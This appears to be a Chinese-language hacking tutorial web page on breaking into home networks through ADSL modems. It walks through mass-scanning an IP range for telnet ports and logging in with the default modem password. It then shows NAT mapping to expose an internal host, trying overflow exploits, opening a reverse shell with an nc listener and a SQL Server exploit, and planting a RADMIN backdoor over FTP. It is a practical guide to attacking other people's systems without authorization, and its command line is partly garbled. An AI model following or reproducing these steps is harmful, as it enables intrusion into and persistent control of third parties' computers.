穿透ADSL路由入侵内网方法: 1.扫描 现在很多ADSL MODEM都是通过80 23 21三个端口来管理,但80 21端口有很多服务器都有打开,没怎么特征性,于是选择了23端口,打开SUPPERSCAN,填上所在地区的IP段,跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了,开23的主机还真不小啊:)我挑了几台出来,在浏览器那里输入IP:218.xxx.xxx.xxx,OK。登陆对话框出来了,输入USER:ADSL pass:adsl1234(因为这里的adsl modem一般是华硕的,缺省是adsl adsl1234)bingle 一矢中的。 2.映射 入侵已经成功了一半,要进一步入侵内网,要进行端口映射,但是连内网的拓扑,都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?一般来说,MODEM的内网IP缺省是192.168.1.1,而大多数就把自己主机的IP设成192.168.1.2。因此只要试试把192.168.1.2的端口映射出来就行了(但如果使用了dhcp就麻烦了)把整台主机透明地映射到外网,具体做法如下:进入NAT选项---添加NAT规则---BAMID---填入主机IP:192.168.1.2,到此192.168.1.2已经透明地映射到192.168.1.1上了,访问ADSL MODEM就等于访问主机192.168.1.2了。 3.检测漏洞 现在再请出SUPPERSCAN对218。xxx.xxx.xxx进行扫描,扫描结果已经不同了,开放的端口是139 1433等,刚才只是开放了80 23 21而已(也就是说映射已经成功了)该是X-SCAN出手了,扫弱口令最好不过了。 4.溢出 既然没有弱口令,也没开80,那只好从逸出方面着手了,但没开80 21 也就webdav .sevr-u的溢出没戏了,向导了RPC溢出,但实践证明RPC溢出也是不行的,LSASS溢出也不行。 5.募然回首,那人却在,灯火阑珊处 这时侯,目光转移到1433上了,于是nc -v -l 99 sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99 bingle 成功地得到一个shell了。 6.设置后门 到这里,入侵已经成功了,余下的是扫尾留后门,至于后门,用FTP上传RADMIN上去就可以了。 |
如何穿透ADSL路由入侵内网
打印